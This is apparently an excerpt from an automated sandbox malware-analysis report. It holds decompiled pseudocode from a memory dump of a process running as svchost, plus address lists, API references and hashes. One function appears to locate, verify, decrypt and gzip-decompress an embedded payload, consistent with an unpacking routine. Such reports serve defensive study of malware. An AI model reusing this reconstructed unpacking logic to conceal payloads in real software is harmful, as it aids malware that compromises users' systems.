                                                                                                                                                                                                                                                                      									_v68 = E04004EA0(_v36, 1);
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_v20 = 0x666;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							if((_v9 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                      								_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							goto L30;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t95 = E04020CE0(8);
                                                                                                                                                                                                                                                                      						_t128 = _t128 + 4;
                                                                                                                                                                                                                                                                      						_v24 = _t95;
                                                                                                                                                                                                                                                                      						if(_v24 == 0) {
                                                                                                                                                                                                                                                                      							_v56 = 0;
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							_v56 = E0401F4E0(_v24);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_v8 = _v56;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_v8 + 4)) = 0;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					L30:
                                                                                                                                                                                                                                                                      					if((_v9 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                      						if(_v8 != 0) {
                                                                                                                                                                                                                                                                      							_v48 = _v8;
                                                                                                                                                                                                                                                                      							_v44 = _v48;
                                                                                                                                                                                                                                                                      							if(_v44 == 0) {
                                                                                                                                                                                                                                                                      								_v72 = 0;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_v72 = E04004EA0(_v44, 1);
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							_v8 = 0x666;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_v8 = 0;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if(0 != 0) {
                                                                                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					L38:
                                                                                                                                                                                                                                                                      					return _v8;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				goto L38;
                                                                                                                                                                                                                                                                      			}

























                                                                                                                                                                                                                                                                      0x040135c0
                                                                                                                                                                                                                                                                      0x040135c6
                                                                                                                                                                                                                                                                      0x040135c9
                                                                                                                                                                                                                                                                      0x040135d0
                                                                                                                                                                                                                                                                      0x040135d4
                                                                                                                                                                                                                                                                      0x040135e8
                                                                                                                                                                                                                                                                      0x04013626
                                                                                                                                                                                                                                                                      0x04013638
                                                                                                                                                                                                                                                                      0x0401364b
                                                                                                                                                                                                                                                                      0x04013650
                                                                                                                                                                                                                                                                      0x04013653
                                                                                                                                                                                                                                                                      0x0401365a
                                                                                                                                                                                                                                                                      0x04013669
                                                                                                                                                                                                                                                                      0x0401365c
                                                                                                                                                                                                                                                                      0x04013664
                                                                                                                                                                                                                                                                      0x04013664
                                                                                                                                                                                                                                                                      0x04013673
                                                                                                                                                                                                                                                                      0x04013689
                                                                                                                                                                                                                                                                      0x04013694
                                                                                                                                                                                                                                                                      0x040136a8
                                                                                                                                                                                                                                                                      0x040136b4
                                                                                                                                                                                                                                                                      0x040136b8
                                                                                                                                                                                                                                                                      0x040136bd
                                                                                                                                                                                                                                                                      0x040136c0
                                                                                                                                                                                                                                                                      0x040136c7
                                                                                                                                                                                                                                                                      0x040136d6
                                                                                                                                                                                                                                                                      0x040136c9
                                                                                                                                                                                                                                                                      0x040136d1
                                                                                                                                                                                                                                                                      0x040136d1
                                                                                                                                                                                                                                                                      0x040136e0
                                                                                                                                                                                                                                                                      0x040136e0
                                                                                                                                                                                                                                                                      0x040136f5
                                                                                                                                                                                                                                                                      0x040136aa
                                                                                                                                                                                                                                                                      0x040136aa
                                                                                                                                                                                                                                                                      0x040136aa
                                                                                                                                                                                                                                                                      0x040136fe
                                                                                                                                                                                                                                                                      0x04013703
                                                                                                                                                                                                                                                                      0x04013709
                                                                                                                                                                                                                                                                      0x04013710
                                                                                                                                                                                                                                                                      0x04013721
                                                                                                                                                                                                                                                                      0x04013712
                                                                                                                                                                                                                                                                      0x0401371c
                                                                                                                                                                                                                                                                      0x0401371c
                                                                                                                                                                                                                                                                      0x04013728
                                                                                                                                                                                                                                                                      0x04013728
                                                                                                                                                                                                                                                                      0x04013735
                                                                                                                                                                                                                                                                      0x04013635
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04013737
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04013735
                                                                                                                                                                                                                                                                      0x040135ea
                                                                                                                                                                                                                                                                      0x040135ec
                                                                                                                                                                                                                                                                      0x040135f1
                                                                                                                                                                                                                                                                      0x040135f4
                                                                                                                                                                                                                                                                      0x040135fb
                                                                                                                                                                                                                                                                      0x0401360a
                                                                                                                                                                                                                                                                      0x040135fd
                                                                                                                                                                                                                                                                      0x04013605
                                                                                                                                                                                                                                                                      0x04013605
                                                                                                                                                                                                                                                                      0x04013614
                                                                                                                                                                                                                                                                      0x0401361a
                                                                                                                                                                                                                                                                      0x0401361a
                                                                                                                                                                                                                                                                      0x0401373e
                                                                                                                                                                                                                                                                      0x04013744
                                                                                                                                                                                                                                                                      0x0401374a
                                                                                                                                                                                                                                                                      0x0401374f
                                                                                                                                                                                                                                                                      0x04013755
                                                                                                                                                                                                                                                                      0x0401375c
                                                                                                                                                                                                                                                                      0x0401376d
                                                                                                                                                                                                                                                                      0x0401375e
                                                                                                                                                                                                                                                                      0x04013768
                                                                                                                                                                                                                                                                      0x04013768
                                                                                                                                                                                                                                                                      0x04013774
                                                                                                                                                                                                                                                                      0x04013774
                                                                                                                                                                                                                                                                      0x0401377b
                                                                                                                                                                                                                                                                      0x0401377b
                                                                                                                                                                                                                                                                      0x04013784
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401378a
                                                                                                                                                                                                                                                                      0x04013790
                                                                                                                                                                                                                                                                      0x04013790
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04013600
                                                                                                                                                                                                                                                                      • codecvt.LIBCPMTD ref: 04013763
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Iterator_baseIterator_base::_codecvtstd::_
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3817610042-0
                                                                                                                                                                                                                                                                      • Opcode ID: f1128d24d620c5156b89d421dd3da55f990c9896146a5d0fdb04f4f7fc45e4ab
                                                                                                                                                                                                                                                                      • Instruction ID: 940426154ba22623eb4585301945e88a2baf8d43e6e943a63c159829dd530f10
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1128d24d620c5156b89d421dd3da55f990c9896146a5d0fdb04f4f7fc45e4ab
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 355105B4E01219EFEB14DF94D594BEEBBB1BB48308F208169E8057B3A0D7756A44CB91
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                                                                                                                                      			E04026C40(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                                                                                      				char _v24;
                                                                                                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                                                                                                      				signed int _v37;
                                                                                                                                                                                                                                                                      				intOrPtr _v44;
                                                                                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                                                                                      				signed int _v52;
                                                                                                                                                                                                                                                                      				signed int _v56;
                                                                                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                                                                                      				intOrPtr* _v64;
                                                                                                                                                                                                                                                                      				signed short* _v68;
                                                                                                                                                                                                                                                                      				signed int _v72;
                                                                                                                                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                                                                                                                                      				signed int _v80;
                                                                                                                                                                                                                                                                      				signed int _v84;
                                                                                                                                                                                                                                                                      				intOrPtr _v88;
                                                                                                                                                                                                                                                                      				char _v92;
                                                                                                                                                                                                                                                                      				signed short* _v96;
                                                                                                                                                                                                                                                                      				signed short* _v100;
                                                                                                                                                                                                                                                                      				signed short* _v104;
                                                                                                                                                                                                                                                                      				char _v108;
                                                                                                                                                                                                                                                                      				intOrPtr _v112;
                                                                                                                                                                                                                                                                      				signed short* _v116;
                                                                                                                                                                                                                                                                      				intOrPtr _v120;
                                                                                                                                                                                                                                                                      				signed short* _v124;
                                                                                                                                                                                                                                                                      				signed int _v128;
                                                                                                                                                                                                                                                                      				intOrPtr _v132;
                                                                                                                                                                                                                                                                      				signed int _v136;
                                                                                                                                                                                                                                                                      				signed int _v140;
                                                                                                                                                                                                                                                                      				intOrPtr _v144;
                                                                                                                                                                                                                                                                      				intOrPtr _v148;
                                                                                                                                                                                                                                                                      				intOrPtr _t154;
                                                                                                                                                                                                                                                                      				intOrPtr _t172;
                                                                                                                                                                                                                                                                      				intOrPtr _t177;
                                                                                                                                                                                                                                                                      				signed int _t183;
                                                                                                                                                                                                                                                                      				void* _t187;
                                                                                                                                                                                                                                                                      				intOrPtr _t191;
                                                                                                                                                                                                                                                                      				intOrPtr _t195;
                                                                                                                                                                                                                                                                      				signed short* _t201;
                                                                                                                                                                                                                                                                      				void* _t204;
                                                                                                                                                                                                                                                                      				intOrPtr _t205;
                                                                                                                                                                                                                                                                      				void* _t210;
                                                                                                                                                                                                                                                                      				void* _t268;
                                                                                                                                                                                                                                                                      				void* _t269;
                                                                                                                                                                                                                                                                      				signed int _t270;
                                                                                                                                                                                                                                                                      				void* _t271;
                                                                                                                                                                                                                                                                      				void* _t272;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t269 = __esi;
                                                                                                                                                                                                                                                                      				_t268 = __edi;
                                                                                                                                                                                                                                                                      				_t210 = __ebx;
                                                                                                                                                                                                                                                                      				_v20 =  *0x429024 ^ _t270;
                                                                                                                                                                                                                                                                      				_v28 =  *0x42741c;
                                                                                                                                                                                                                                                                      				_v24 =  *0x427420;
                                                                                                                                                                                                                                                                      				_t246 =  *0x427424;
                                                                                                                                                                                                                                                                      				_v16 =  *0x427424;
                                                                                                                                                                                                                                                                      				_v12 = 0;
                                                                                                                                                                                                                                                                      				_t154 = E04020CE0(8);
                                                                                                                                                                                                                                                                      				_t272 = _t271 + 4;
                                                                                                                                                                                                                                                                      				_v112 = _t154;
                                                                                                                                                                                                                                                                      				if(_v112 == 0) {
                                                                                                                                                                                                                                                                      					_v140 = 0;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_v140 = E0401F4E0(_v112);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_v8 = _v140;
                                                                                                                                                                                                                                                                      				while(_a4 != 0 && _a8 >= 4) {
                                                                                                                                                                                                                                                                      					_t246 = _a4;
                                                                                                                                                                                                                                                                      					E0401F9F0(_t210, _v8, _a4, _a4, _a8, 0);
                                                                                                                                                                                                                                                                      					_v36 = 0;
                                                                                                                                                                                                                                                                      					_v32 = 0;
                                                                                                                                                                                                                                                                      					_v37 = 0;
                                                                                                                                                                                                                                                                      					while((_v37 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                      						_t246 =  &_v28;
                                                                                                                                                                                                                                                                      						_v36 = E0401F370(_v8,  &_v28, 4, _v36);
                                                                                                                                                                                                                                                                      						if(_v36 >= 0) {
                                                                                                                                                                                                                                                                      							_v36 = _v36 + 4;
                                                                                                                                                                                                                                                                      							_t246 =  &_v16;
                                                                                                                                                                                                                                                                      							_v32 = E0401F370(_v8,  &_v16, 3, _v36);
                                                                                                                                                                                                                                                                      							if(_v32 >= 0) {
                                                                                                                                                                                                                                                                      								_v44 = _v32 - _v36;
                                                                                                                                                                                                                                                                      								_t246 = _v36;
                                                                                                                                                                                                                                                                      								_v52 = E0401F410(_v8,  &_v28, 4, _v36, _v44);
                                                                                                                                                                                                                                                                      								if(_v52 <= 0xffffffff) {
                                                                                                                                                                                                                                                                      									_v56 = 0;
                                                                                                                                                                                                                                                                      									_t172 = E0401EAF0(_t268, _a4 + _v36, _v32 - _v36,  &_v56);
                                                                                                                                                                                                                                                                      									_t272 = _t272 + 0xc;
                                                                                                                                                                                                                                                                      									_v48 = _t172;
                                                                                                                                                                                                                                                                      									if(_v48 <= 4 || _v56 == 0) {
                                                                                                                                                                                                                                                                      										L47:
                                                                                                                                                                                                                                                                      										_t246 = _v37 & 0x000000ff;
                                                                                                                                                                                                                                                                      										if((_v37 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                      											_v36 = _v32 + 3;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										continue;
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										_t177 = E040223A0(_v56 + 4, _v48 - 4);
                                                                                                                                                                                                                                                                      										_t272 = _t272 + 8;
                                                                                                                                                                                                                                                                      										_v60 = _t177;
                                                                                                                                                                                                                                                                      										if(_v60 !=  *_v56) {
                                                                                                                                                                                                                                                                      											L45:
                                                                                                                                                                                                                                                                      											if(_v56 != 0) {
                                                                                                                                                                                                                                                                      												_v128 = _v56;
                                                                                                                                                                                                                                                                      												E04020CC0(_v128);
                                                                                                                                                                                                                                                                      												_t272 = _t272 + 4;
                                                                                                                                                                                                                                                                      												_v56 = 0x666;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											goto L47;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										_v64 = _v56 + 4;
                                                                                                                                                                                                                                                                      										_t229 = _v48 - 4;
                                                                                                                                                                                                                                                                      										_v68 = _v48 - 4;
                                                                                                                                                                                                                                                                      										while(1) {
                                                                                                                                                                                                                                                                      											L19:
                                                                                                                                                                                                                                                                      											_t183 = E04021D10(_t229,  *_v64);
                                                                                                                                                                                                                                                                      											_t272 = _t272 + 4;
                                                                                                                                                                                                                                                                      											_v84 = _t183;
                                                                                                                                                                                                                                                                      											if((_v84 & 0x0000ffff) < 1 || (_v84 & 0x0000ffff) > 0x7d00) {
                                                                                                                                                                                                                                                                      												break;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											_v80 = _v84 & 0x0000ffff;
                                                                                                                                                                                                                                                                      											_t187 = E040221A0(_v64 + 8,  &_v80, _v64 + 4, 4);
                                                                                                                                                                                                                                                                      											_t272 = _t272 + 0x10;
                                                                                                                                                                                                                                                                      											if(_t187 != 0) {
                                                                                                                                                                                                                                                                      												_v72 = 0;
                                                                                                                                                                                                                                                                      												_t191 = E04022700(_t210, _t268, _t269, _v64 + (_v84 & 0x0000ffff) + 8, _v68 - (_v84 & 0x0000ffff) + 8, 0x429fb0, 0x254, _v64 + 8, _v80,  &_v72);
                                                                                                                                                                                                                                                                      												_t272 = _t272 + 0x1c;
                                                                                                                                                                                                                                                                      												_v76 = _t191;
                                                                                                                                                                                                                                                                      												if(_v72 != 0) {
                                                                                                                                                                                                                                                                      													while(1) {
                                                                                                                                                                                                                                                                      														_t229 = _v68 - (_v84 & 0x0000ffff) + 8;
                                                                                                                                                                                                                                                                      														if(_v76 != _v68 - (_v84 & 0x0000ffff) + 8) {
                                                                                                                                                                                                                                                                      															break;
                                                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                                                      														_t195 = E040223A0(_v72, _v76 - 4);
                                                                                                                                                                                                                                                                      														_t272 = _t272 + 8;
                                                                                                                                                                                                                                                                      														_v88 = _t195;
                                                                                                                                                                                                                                                                      														_t229 = _v72 + _v76;
                                                                                                                                                                                                                                                                      														if(_v88 !=  *((intOrPtr*)(_v72 + _v76 - 4))) {
                                                                                                                                                                                                                                                                      															L41:
                                                                                                                                                                                                                                                                      															if(0 != 0) {
                                                                                                                                                                                                                                                                      																continue;
                                                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                                                      															L42:
                                                                                                                                                                                                                                                                      															if(_v72 != 0) {
                                                                                                                                                                                                                                                                      																_v124 = _v72;
                                                                                                                                                                                                                                                                      																_t229 = _v124;
                                                                                                                                                                                                                                                                      																E04020CC0(_v124);
                                                                                                                                                                                                                                                                      																_t272 = _t272 + 4;
                                                                                                                                                                                                                                                                      																_v72 = 0x666;
                                                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                                                      															if(0 != 0) {
                                                                                                                                                                                                                                                                      																goto L19;
                                                                                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                                                                                      																goto L45;
                                                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                                                                                      															goto L29;
                                                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                                                      														while(1) {
                                                                                                                                                                                                                                                                      															L29:
                                                                                                                                                                                                                                                                      															_v100 = _v72;
                                                                                                                                                                                                                                                                      															_t229 = _v76 - 4;
                                                                                                                                                                                                                                                                      															_v104 = _v76 - 4;
                                                                                                                                                                                                                                                                      															if(( *_v100 & 0x0000ffff) != 0x8b1f) {
                                                                                                                                                                                                                                                                      																break;
                                                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                                                      															_t229 = _v100 + _v104;
                                                                                                                                                                                                                                                                      															_v108 =  *((intOrPtr*)(_v100 + _v104 - 4));
                                                                                                                                                                                                                                                                      															if(_v108 >= 1) {
                                                                                                                                                                                                                                                                      																_t201 = E04020CE0(_v108);
                                                                                                                                                                                                                                                                      																_t272 = _t272 + 4;
                                                                                                                                                                                                                                                                      																_v116 = _t201;
                                                                                                                                                                                                                                                                      																_t229 = _v116;
                                                                                                                                                                                                                                                                      																_v96 = _v116;
                                                                                                                                                                                                                                                                      																if(_v96 != 0) {
                                                                                                                                                                                                                                                                      																	_v92 = _v108;
                                                                                                                                                                                                                                                                      																	_t229 = _v100;
                                                                                                                                                                                                                                                                      																	_t204 = E0401E240(_t210, _t268, _t269, _v96,  &_v92, _v100, _v104);
                                                                                                                                                                                                                                                                      																	_t272 = _t272 + 0x10;
                                                                                                                                                                                                                                                                      																	if(_t204 == 0) {
                                                                                                                                                                                                                                                                      																		_t205 = E04020CE0(8);
                                                                                                                                                                                                                                                                      																		_t272 = _t272 + 4;
                                                                                                                                                                                                                                                                      																		_v120 = _t205;
                                                                                                                                                                                                                                                                      																		if(_v120 == 0) {
                                                                                                                                                                                                                                                                      																			_v144 = 0;
                                                                                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                                                                                      																			_v144 = E0401F4E0(_v120);
                                                                                                                                                                                                                                                                      																		}
                                                                                                                                                                                                                                                                      																		_v12 = _v144;
                                                                                                                                                                                                                                                                      																		E0401F9F0(_t210, _v12, _v108, _v96, _v108, 0);
                                                                                                                                                                                                                                                                      																		_v37 = 1;
                                                                                                                                                                                                                                                                      																		_t229 = 0;
                                                                                                                                                                                                                                                                      																		if(0 != 0) {
                                                                                                                                                                                                                                                                      																			continue;
                                                                                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                                                                                      																			goto L41;
                                                                                                                                                                                                                                                                      																		}
                                                                                                                                                                                                                                                                      																	}
                                                                                                                                                                                                                                                                      																	goto L41;
                                                                                                                                                                                                                                                                      																}
                                                                                                                                                                                                                                                                      																goto L41;
                                                                                                                                                                                                                                                                      															}
                                                                                                                                                                                                                                                                      															goto L41;
                                                                                                                                                                                                                                                                      														}
                                                                                                                                                                                                                                                                      														goto L41;
                                                                                                                                                                                                                                                                      													}
                                                                                                                                                                                                                                                                      													goto L42;
                                                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                                                      												goto L45;
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      											goto L45;
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      										goto L45;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_v36 = _v52;
                                                                                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						break;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if(0 != 0) {
                                                                                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					L51:
                                                                                                                                                                                                                                                                      					if(_v8 != 0) {
                                                                                                                                                                                                                                                                      						_t246 = _v8;
                                                                                                                                                                                                                                                                      						_v136 = _v8;
                                                                                                                                                                                                                                                                      						_v132 = _v136;
                                                                                                                                                                                                                                                                      						if(_v132 == 0) {
                                                                                                                                                                                                                                                                      							_v148 = 0;
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							_v148 = E04004EA0(_v132, 1);
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_v8 = 0x666;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					return E04006C8C(_v12, _t210, _v20 ^ _t270, _t246, _t268, _t269);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				goto L51;
                                                                                                                                                                                                                                                                      			}























































                                                                                                                                                                                                                                                                      0x04026c40
                                                                                                                                                                                                                                                                      0x04026c40
                                                                                                                                                                                                                                                                      0x04026c40
                                                                                                                                                                                                                                                                      0x04026c50
                                                                                                                                                                                                                                                                      0x04026c58
                                                                                                                                                                                                                                                                      0x04026c61
                                                                                                                                                                                                                                                                      0x04026c64
                                                                                                                                                                                                                                                                      0x04026c6a
                                                                                                                                                                                                                                                                      0x04026c6d
                                                                                                                                                                                                                                                                      0x04026c76
                                                                                                                                                                                                                                                                      0x04026c7b
                                                                                                                                                                                                                                                                      0x04026c7e
                                                                                                                                                                                                                                                                      0x04026c85
                                                                                                                                                                                                                                                                      0x04026c97
                                                                                                                                                                                                                                                                      0x04026c87
                                                                                                                                                                                                                                                                      0x04026c8f
                                                                                                                                                                                                                                                                      0x04026c8f
                                                                                                                                                                                                                                                                      0x04026ca7
                                                                                                                                                                                                                                                                      0x04026caa
                                                                                                                                                                                                                                                                      0x04026cc1
                                                                                                                                                                                                                                                                      0x04026cc8
                                                                                                                                                                                                                                                                      0x04026ccd
                                                                                                                                                                                                                                                                      0x04026cd4
                                                                                                                                                                                                                                                                      0x04026cdb
                                                                                                                                                                                                                                                                      0x04026cdf
                                                                                                                                                                                                                                                                      0x04026cf1
                                                                                                                                                                                                                                                                      0x04026cfd
                                                                                                                                                                                                                                                                      0x04026d04
                                                                                                                                                                                                                                                                      0x04026d11
                                                                                                                                                                                                                                                                      0x04026d1a
                                                                                                                                                                                                                                                                      0x04026d26
                                                                                                                                                                                                                                                                      0x04026d2d
                                                                                                                                                                                                                                                                      0x04026d3a
                                                                                                                                                                                                                                                                      0x04026d41
                                                                                                                                                                                                                                                                      0x04026d53
                                                                                                                                                                                                                                                                      0x04026d5a
                                                                                                                                                                                                                                                                      0x04026d67
                                                                                                                                                                                                                                                                      0x04026d80
                                                                                                                                                                                                                                                                      0x04026d85
                                                                                                                                                                                                                                                                      0x04026d88
                                                                                                                                                                                                                                                                      0x04026d8f
                                                                                                                                                                                                                                                                      0x04026fd8
                                                                                                                                                                                                                                                                      0x04026fd8
                                                                                                                                                                                                                                                                      0x04026fde
                                                                                                                                                                                                                                                                      0x04026fe6
                                                                                                                                                                                                                                                                      0x04026fe6
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026d9f
                                                                                                                                                                                                                                                                      0x04026dad
                                                                                                                                                                                                                                                                      0x04026db2
                                                                                                                                                                                                                                                                      0x04026db5
                                                                                                                                                                                                                                                                      0x04026dc0
                                                                                                                                                                                                                                                                      0x04026fb9
                                                                                                                                                                                                                                                                      0x04026fbd
                                                                                                                                                                                                                                                                      0x04026fc2
                                                                                                                                                                                                                                                                      0x04026fc9
                                                                                                                                                                                                                                                                      0x04026fce
                                                                                                                                                                                                                                                                      0x04026fd1
                                                                                                                                                                                                                                                                      0x04026fd1
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026fbd
                                                                                                                                                                                                                                                                      0x04026dcc
                                                                                                                                                                                                                                                                      0x04026dd2
                                                                                                                                                                                                                                                                      0x04026dd5
                                                                                                                                                                                                                                                                      0x04026dd8
                                                                                                                                                                                                                                                                      0x04026dd8
                                                                                                                                                                                                                                                                      0x04026dde
                                                                                                                                                                                                                                                                      0x04026de3
                                                                                                                                                                                                                                                                      0x04026de6
                                                                                                                                                                                                                                                                      0x04026df1
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026e08
                                                                                                                                                                                                                                                                      0x04026e1f
                                                                                                                                                                                                                                                                      0x04026e24
                                                                                                                                                                                                                                                                      0x04026e29
                                                                                                                                                                                                                                                                      0x04026e30
                                                                                                                                                                                                                                                                      0x04026e69
                                                                                                                                                                                                                                                                      0x04026e6e
                                                                                                                                                                                                                                                                      0x04026e71
                                                                                                                                                                                                                                                                      0x04026e78
                                                                                                                                                                                                                                                                      0x04026e7f
                                                                                                                                                                                                                                                                      0x04026e89
                                                                                                                                                                                                                                                                      0x04026e8e
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026ea0
                                                                                                                                                                                                                                                                      0x04026ea5
                                                                                                                                                                                                                                                                      0x04026ea8
                                                                                                                                                                                                                                                                      0x04026eae
                                                                                                                                                                                                                                                                      0x04026eb7
                                                                                                                                                                                                                                                                      0x04026f8a
                                                                                                                                                                                                                                                                      0x04026f8c
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026f92
                                                                                                                                                                                                                                                                      0x04026f96
                                                                                                                                                                                                                                                                      0x04026f9b
                                                                                                                                                                                                                                                                      0x04026f9e
                                                                                                                                                                                                                                                                      0x04026fa2
                                                                                                                                                                                                                                                                      0x04026fa7
                                                                                                                                                                                                                                                                      0x04026faa
                                                                                                                                                                                                                                                                      0x04026faa
                                                                                                                                                                                                                                                                      0x04026fb3
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026ebd
                                                                                                                                                                                                                                                                      0x04026ebd
                                                                                                                                                                                                                                                                      0x04026ec0
                                                                                                                                                                                                                                                                      0x04026ec6
                                                                                                                                                                                                                                                                      0x04026ec9
                                                                                                                                                                                                                                                                      0x04026ed7
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026ee1
                                                                                                                                                                                                                                                                      0x04026ee7
                                                                                                                                                                                                                                                                      0x04026eee
                                                                                                                                                                                                                                                                      0x04026ef9
                                                                                                                                                                                                                                                                      0x04026efe
                                                                                                                                                                                                                                                                      0x04026f01
                                                                                                                                                                                                                                                                      0x04026f04
                                                                                                                                                                                                                                                                      0x04026f07
                                                                                                                                                                                                                                                                      0x04026f0e
                                                                                                                                                                                                                                                                      0x04026f15
                                                                                                                                                                                                                                                                      0x04026f1c
                                                                                                                                                                                                                                                                      0x04026f28
                                                                                                                                                                                                                                                                      0x04026f2d
                                                                                                                                                                                                                                                                      0x04026f32
                                                                                                                                                                                                                                                                      0x04026f38
                                                                                                                                                                                                                                                                      0x04026f3d
                                                                                                                                                                                                                                                                      0x04026f40
                                                                                                                                                                                                                                                                      0x04026f47
                                                                                                                                                                                                                                                                      0x04026f59
                                                                                                                                                                                                                                                                      0x04026f49
                                                                                                                                                                                                                                                                      0x04026f51
                                                                                                                                                                                                                                                                      0x04026f51
                                                                                                                                                                                                                                                                      0x04026f69
                                                                                                                                                                                                                                                                      0x04026f79
                                                                                                                                                                                                                                                                      0x04026f7e
                                                                                                                                                                                                                                                                      0x04026f82
                                                                                                                                                                                                                                                                      0x04026f84
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04026f84
